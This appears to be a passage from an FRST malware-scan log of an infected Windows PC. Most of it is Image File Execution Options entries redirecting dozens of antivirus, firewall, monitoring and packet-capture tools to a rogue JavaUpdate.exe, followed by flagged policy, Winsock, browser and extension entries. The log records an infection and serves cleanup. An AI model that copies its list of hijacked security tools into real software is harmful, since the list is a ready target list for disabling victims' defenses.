IFEO\mcvsescn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mergecap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpCmdRun.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\mpfcm.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MpUXSrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MSASCui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msconfig.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MsMpEng.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\msseces.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWAGENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\MWASER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanoav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nanosvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\navapsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nbrowser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netguard: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\netguardlite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Netmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\njeeves2.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nnf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nod32krn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nprosec.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\NS.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nseupdatesvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nstzerospywarelite.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcod.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvcsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nvoy.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\nwscmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\oasclnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\omnitray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OnAccessInstaller.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ONLINENT.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opf.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\opfsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\OPSSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\op_mon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\outpost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetizer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Packetyzer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcipprev.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctav.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pctavsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pcviper.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\persfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pfft.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pgaccount.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prevxcsi.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\prifw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\privatefirewall3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ProcessHacker.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procexp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procguard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\procmon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\protect.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSANHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAMain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PSUAService.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSessionAgent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtSvcHost.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\PtWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\pxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\QUHLPSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rawshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\RDTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\regedit.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\rtt_crc_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sab_wab.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sagui.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SAPISSVC.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASCore64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SASTask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savadminservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcleanup.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savcli.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savmain.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savprogress.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\savservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBAMTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SBPIMSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANNER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SCANWSCS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfmanager.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scfservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\schedulerdaemon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\scproxysrv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ScSecSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconIA.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcdevconx.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdcservice.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDFSSvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDScan.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sdtrayapp.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SDWelcome.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\siteadv.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sndsrvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Sniffer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsmcon.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\snsupd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SoftAct.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spfirewallsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sppfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spybotsd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SpyHunter3.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywareterminatorshield.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\spywat~1.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\sp_rsser.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\ssupdate.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SSUpdate64.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERAntiSpyware.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\SUPERDelete.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Taskmgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tcpdump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\terminet.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Tethereal.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\text2pcap.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\THGuard.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tppfdmn.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYICOS.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\TRAYSSER.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\trigger.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tscutynt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\tzpfw.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiSeAgnt.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiUpdateTray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWatchDog.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uiWinMgr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxagent.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\umxtray.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UnThreat.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\updclient.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UserAccountControlSettings.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\utsvc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\UUpd.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\uwcdsvr.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Main.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Medic.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Proxy.ahn: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3SP.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Svc.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\V3Up.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VCATCH.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\vdtask.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIEWTCP.EXE: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VIPREUI.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\virusutilities.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\VSDesktop.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\WebCompanion.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\webwall.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Windump.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\winroute.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wireshark.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\wwasher.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xauth_service.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\xfilter.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zanda.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarele.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zerospywarelite_installer.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\Zlh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
IFEO\zlhh.exe: [Debugger] C:\Users\Kevin\AppData\Roaming\Oracle\JavaUpdate.exe
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 03 C:\Windows\SysWOW64\mswsock.dll [231424 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 04 %SystemRoot%\System32\nwprovau.dll No File
Winsock: Catalog5-x64 01 C:\Windows\System32\mswsock.dll [327168 2016-05-11] (Microsoft Corporation) ATTENTION: LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{0D6C597F-BEA6-4C5F-B16E-5D8A77442F57}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{1EF46E09-C75C-4B5D-87E6-60F8E9B8AC96}: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{5F5D0476-C352-4839-8C17-C65B27F8B0FF}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> DefaultScope {7B00843A-8871-4C08-BC28-96ABB84D43E4} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=
SearchScopes: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> {7B00843A-8871-4C08-BC28-96ABB84D43E4} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}&rlz=
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\ssv.dll [2016-04-27] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\jp2ssv.dll [2016-04-27] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-04-29] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-1764878690-1872824068-2637823629-1001 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: HKLM-x32 {233C1507-6A77-46A4-9443-F871F945D258} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

FireFox:
========
FF ProfilePath: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default [2016-10-19]
FF user.js: detected! => C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\user.js [2016-09-16]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\0qifstuh.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\0qifstuh.default -> Google
FF Homepage: Mozilla\Firefox\Profiles\0qifstuh.default -> hxxp://www.gbatemp.net
FF NetworkProxy: Mozilla\Firefox\Profiles\0qifstuh.default -> type", 0
FF Extension: (about:addons-memory 2016) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\about-addons-memory@sturdiguns.org.xpi [2016-05-02]
FF Extension: (Classic Theme Restorer) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\ClassicThemeRestorer@ArisT2Noia4dev.xpi [2016-10-15]
FF Extension: (Gmail™ Notifier (restartless)) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\jid0-GjwrPchS3Ugt7xydvqVK4DQk8Ls@jetpack.xpi [2016-10-14]
FF Extension: (Hide Fedora) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\jid1-tg9TKUYM47PZpg@jetpack.xpi [2016-03-30]
FF Extension: (Broadband Speed Test and Diagnostics) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\speedtest@gotomyhelp(2).com [2009-10-15] [not signed]
FF Extension: (No Name) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\temp [2009-10-15] [not signed]
FF Extension: (VideoDownloader) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\videodowloader@videodownloader(2).net [2009-10-15] [not signed]
FF Extension: (IE Tab 2 (FF 3.6+)) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{1BC9BA34-1EED-42ca-A505-6D2F1A935BBB} [2016-02-19]
FF Extension: (Forecastfox Enhanced) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{3CE993BF-A3D9-4fd2-B3B6-768CBBC337F8}(2) [2009-10-15] [not signed]
FF Extension: (Download YouTube Videos as MP4) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{b9bfaf1c-a63f-47cd-8b9a-29526ced9060}.xpi [2016-09-03]
FF Extension: (Video DownloadHelper) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2016-10-11]
FF Extension: (Adblock Plus) - C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-04-28]
FF SearchPlugin: C:\Users\Kevin\AppData\Roaming\Mozilla\Firefox\Profiles\0qifstuh.default\searchplugins\piratebay.xml [2008-05-29]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-06-13] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_242.dll [2016-06-15] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX64.dll [2012-10-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_242.dll [2016-06-15] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1209149.dll [2014-01-28] (Adobe Systems, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-04-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files (x86)\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-04-27] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50709.0\npctrl.dll [2016-07-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2010-04-26] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
